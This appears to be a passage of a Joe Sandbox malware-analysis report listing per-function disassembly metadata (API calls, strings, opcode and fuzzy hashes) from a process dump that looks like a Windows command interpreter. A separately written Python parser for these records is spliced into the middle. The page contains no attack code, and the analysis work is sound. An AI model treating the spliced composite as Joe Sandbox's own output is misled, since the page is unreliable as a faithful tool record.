• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: longjmp
• String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
• API String ID: 1832741078-366822981
• Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
• Instruction ID: 57fa3baaa31f231f1fa34637a335536b21f16d78c2498b6e1262b0cfd5229404
• Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
• Instruction Fuzzy Hash: 34C17C33E0C686C1E6289F9661507BC2792BF46B84FA04036DD0DD7791CE3EA64EC74A
APIs
  • Part of subcall function 00007FF6E942CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDA6
  • Part of subcall function 00007FF6E942CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDBD
• memset.MSVCRT ref: 00007FF6E942BA2B
• wcschr.MSVCRT ref: 00007FF6E942BA8A
• wcschr.MSVCRT ref: 00007FF6E942BAAA
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Heapwcschr$AllocProcessmemset
• String ID: -$:.\$=,;$=,;+/[] "
• API String ID: 2872855111-969133440
• Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
• Instruction ID: c741827d3432e8becd184f326678a86fb24b8a6d6a9b4473d9a5374f40e753ab
• Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
• Instruction Fuzzy Hash: 96B18023A0DA42C1EA608F25949437D67A4FF8AB84F954235CE5EC7794DF3EE449C30A
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Heap$_wcsicmp$AllocProcess
• String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
• API String ID: 3223794493-3086019870
• Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
• Instruction ID: 325189a407e551eaac11181667473d48774ef0d91f6da918dc57e357d9b1de40
• Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
• Instruction Fuzzy Hash: 56517D76A08642C5EB148F65A8003BD7BA0FF49B90F188135C91E873A1EF3EE049C71A
APIs
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
• String ID:
• API String ID: 1944892715-0
• Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
• Instruction ID: bd09b106be35f47bc70c954fda5148d5f205fe5e28627557b3a28b89fbc45013
• Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
• Instruction Fuzzy Hash: F5B16D73A09742C6EB649F62A4543BD66A0FF59B80F448135CA4EC7391EF3EE448C70A
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: LocalTime$ErrorLast_get_osfhandle
• String ID: %s$/-.$:
• API String ID: 1644023181-879152773
• Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
• Instruction ID: 5a0ab57edb512f36f9b822ff7e0aacd5c21040a458118f7d232b545be75b4d19
• Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
• Instruction Fuzzy Hash: 73918C63A18642D1FF109F64D4503FA63A0FF84B94F844136DA4EC6795EE3EE54ACB0A
APIs
• WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6E9447251), ref: 00007FF6E944628E
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: ObjectSingleWait
• String ID: wil
• API String ID: 24740636-1589926490
• Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
• Instruction ID: 255320c338283de0839182fe880549dff577547de3df15074543336a7110aa62
• Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
• Instruction Fuzzy Hash: E1412C33A08682C3F7604F55E40037A66B1EF86781F649131D90AC6A94DF3EE84EDF06
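The function records above follow one fixed layout (an APIs list, an optional Strings header, the memory dump the function was carved from, and a Similarity block carrying the API ID, the `$`-separated String ID and the opcode and instruction hashes). The parser below is an added example, not Joe Sandbox tooling or part of this report: it turns that layout into records so an analyst can pivot on API names, dump process index or hash values across many functions instead of scrolling. The two records embedded in `SAMPLE` are copied from this page with the leading whitespace and the "Download File" link text removed and the "Associated" dump lines left out; the parser ignores those lines anyway. The record structure, the field names and the `$` separator are taken from the page itself; everything else (class names, the `subcall` flag, the helper functions) is the example's own design.

```python
"""Parse the per-function metadata records of a Joe Sandbox disassembly listing."""
import re
from dataclasses import dataclass, field

# Constructed sample: two records copied from the listing above in the same
# layout, with leading whitespace and link text stripped and "Associated" lines omitted.
SAMPLE = """\
APIs
• Part of subcall function 00007FF6E942CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDA6
• Part of subcall function 00007FF6E942CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDBD
• memset.MSVCRT ref: 00007FF6E942BA2B
• wcschr.MSVCRT ref: 00007FF6E942BA8A
• wcschr.MSVCRT ref: 00007FF6E942BAAA
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Heapwcschr$AllocProcessmemset
• String ID: -$:.\\$=,;$=,;+/[] "
• API String ID: 2872855111-969133440
• Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
• Instruction ID: c741827d3432e8becd184f326678a86fb24b8a6d6a9b4473d9a5374f40e753ab
• Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
• Instruction Fuzzy Hash: 96B18023A0DA42C1EA608F25949437D67A4FF8AB84F954235CE5EC7794DF3EE449C30A
APIs
• WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6E9447251), ref: 00007FF6E944628E
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: ObjectSingleWait
• String ID: wil
• API String ID: 24740636-1589926490
• Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
• Instruction ID: 255320c338283de0839182fe880549dff577547de3df15074543336a7110aa62
• Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
• Instruction Fuzzy Hash: E1412C33A08682C3F7604F55E40037A66B1EF86781F649131D90AC6A94DF3EE84EDF06
"""

# "• name.MODULE(args), ref: ADDR" or "• name.MODULE ref: ADDR", optionally
# prefixed with "Part of subcall function ADDR: " for calls made via a callee.
API_RE = re.compile(
    r"^• (?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>[\w\-]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
SOURCE_RE = re.compile(
    r"^• Source File: (?P<file>\S+\.sdmp), Offset: (?P<base>[0-9A-F]+), based on PE: (?P<pe>true|false)$"
)
FIELD_RE = re.compile(r"^• (?P<key>[A-Za-z ]+?): ?(?P<value>.*)$")


@dataclass
class ApiRef:
    name: str      # imported function, e.g. "HeapAlloc"
    module: str    # module as the report prints it, e.g. "MSVCRT"
    ref: str       # address of the call site (hex string, as printed)
    subcall: bool  # True when reached through a "Part of subcall function" entry


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    source_file: str = ""
    process_index: int = -1   # first dotted field of the .sdmp name (6 for every record here)
    image_base: str = ""
    api_id: str = ""
    strings: list = field(default_factory=list)
    opcode_id: str = ""
    instruction_id: str = ""
    opcode_fuzzy: str = ""
    instruction_fuzzy: str = ""


def parse_records(text):
    """Split the listing at each 'APIs' header and fill one FunctionRecord per function."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue  # section headers such as Strings / Memory Dump Source / Similarity
        m = API_RE.match(line)
        if m:
            cur.apis.append(ApiRef(m["name"], m["module"], m["ref"], m["sub"] is not None))
            continue
        m = SOURCE_RE.match(line)
        if m:
            cur.source_file = m["file"]
            cur.process_index = int(m["file"].split(".")[0])
            cur.image_base = m["base"]
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m["key"], m["value"].strip()
        if key == "API ID":
            cur.api_id = value
        elif key == "String ID":
            cur.strings = value.split("$") if value else []  # '$' separates strings in the report
        elif key == "Opcode ID":
            cur.opcode_id = value
        elif key == "Instruction ID":
            cur.instruction_id = value
        elif key == "Opcode Fuzzy Hash":
            cur.opcode_fuzzy = value
        elif key == "Instruction Fuzzy Hash":
            cur.instruction_fuzzy = value
    return records


def records_calling(records, api_name, include_subcalls=False):
    """Records whose own body (or, optionally, one of its callees) reaches api_name."""
    return [r for r in records
            if any(a.name == api_name and (include_subcalls or not a.subcall) for a in r.apis)]


def api_inventory(records):
    """Module -> sorted API names: a quick capability overview of one dump."""
    inv = {}
    for r in records:
        for a in r.apis:
            inv.setdefault(a.module, set()).add(a.name)
    return {mod: sorted(names) for mod, names in inv.items()}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(r.api_id, r.process_index, [a.name for a in r.apis], r.strings)
    print(api_inventory(recs))
```

When run over a whole report, `records_calling(recs, "WaitForSingleObject")` and the per-process `api_inventory` give a fast way to find which dump (by process index) contains the functions of interest, and the Opcode and Instruction IDs can be compared across reports to spot the same function in a different sample.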
APIs
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: CreateDirectoryDriveFullNamePathTypememset
• String ID:
• API String ID: 1397130798-0
APIs
  • Part of subcall function 00007FF6E94306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306D6
  • Part of subcall function 00007FF6E94306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306F0
  • Part of subcall function 00007FF6E94306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E943074D
  • Part of subcall function 00007FF6E94306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E9430762
• _wcsicmp.MSVCRT ref: 00007FF6E94325CA
• _wcsicmp.MSVCRT ref: 00007FF6E94325E8
• _wcsicmp.MSVCRT ref: 00007FF6E943260F
• _wcsicmp.MSVCRT ref: 00007FF6E9432636
• _wcsicmp.MSVCRT ref: 00007FF6E9432650
Strings
Similarity
• API ID: _wcsicmp$Heap$AllocProcess
• String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
• API String ID: 3407644289-1668778490
APIs
  • Part of subcall function 00007FF6E942D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D46E
  • Part of subcall function 00007FF6E942D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D485
  • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D4EE
  • Part of subcall function 00007FF6E942D3F0: iswspace.MSVCRT ref: 00007FF6E942D54D
  • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D569
  • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D58C
• iswspace.MSVCRT ref: 00007FF6E9437EEE
Strings
Similarity
• API ID: wcschr$Heapiswspace$AllocProcess
• String ID: A
• API String ID: 3731854180-3554254475
APIs
Strings
Similarity
• API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
• String ID: PE
• API String ID: 2941894976-4258593460
APIs
Strings
Similarity
• API ID: Enum$Openwcsrchr
• String ID: %s=%s$.$\Shell\Open\Command
• API String ID: 3402383852-1459555574
APIs
• iswdigit.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F0D6
• iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6E942E626,?,?,00000000,00007FF6E9431F69), ref: 00007FF6E942F1BA
• wcschr.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F1E7
• iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF6E942E626,?,?,00000000,00007FF6E9431F69), ref: 00007FF6E942F1FF
• iswdigit.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F2BB
Strings
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: iswdigit$iswspacewcschr
                                                                                                                                                                        • String ID: )$=,;
                                                                                                                                                                        • API String ID: 1959970872-2167043656
                                                                                                                                                                        • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                                                                                        • Instruction ID: bced797ef8aaf701db302e535f7259d5add735f7a748c36dbd60f535f1d3421f
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                                                                                        • Instruction Fuzzy Hash: EA418763E08656C6FB648F11A91437926A0BF12751FC45071CE89C36A4DF3EA8C9CB0A
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                         • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                                                                                                        • String ID: %04X-%04X$:
                                                                                                                                                                        • API String ID: 930873262-1938371929
                                                                                                                                                                        • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                                                                        • Instruction ID: f771fb9a206d89ed07e728582aba313c4fa3f57fe4d45a320697e07c221ef564
                                                                                                                                                                        • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                                                                        • Instruction Fuzzy Hash: 2A416033A08A82D2EB209F60E4543BA62A0FF84B55F408135EA4DC37D5DF7ED549CB1A
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                         • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                                                                                        • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                                                                        • API String ID: 3249344982-2616576482
                                                                                                                                                                        • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                                                                        • Instruction ID: afd473c8b172a1a6a0acfaa2e4c080aafd8906148edc118c83226cbad4888695
                                                                                                                                                                        • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                                                                        • Instruction Fuzzy Hash: 9C413CB3A18B41C6E3108F22A84436ABAA4FF99FD4F448234DE4987794DF3ED058CB05
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                         • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1313749407-0
                                                                                                                                                                        • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                                                                                        • Instruction ID: 65ffbba6bddd6c846dbc08954bbfcf9ede96746683c7cd5330bc8be1b6c92710
                                                                                                                                                                        • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                                                                                        • Instruction Fuzzy Hash: 3A519123A08682C2EB14DF3198083BDA691BF49B90F585230DD1E877D5EF3EE449C70A
                                                                                                                                                                        APIs
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E9443687
                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6E942260D), ref: 00007FF6E94436A6
                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6E942260D), ref: 00007FF6E94436EB
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E9443703
                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6E942260D), ref: 00007FF6E9443722
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                         • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Console$Write_get_osfhandle$Mode
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1066134489-0
                                                                                                                                                                        • Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                                                                                                                        • Instruction ID: e88c57aec55ef78da04ba9b645456917f9a82f17653d9bc3f6a43ac7635f2f28
                                                                                                                                                                        • Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                                                                                                                        • Instruction Fuzzy Hash: C2519363B08642D7EB249F21960477AA691FF44B90F088435DE4EC7790EF3EE449CB0A
                                                                                                                                                                        APIs
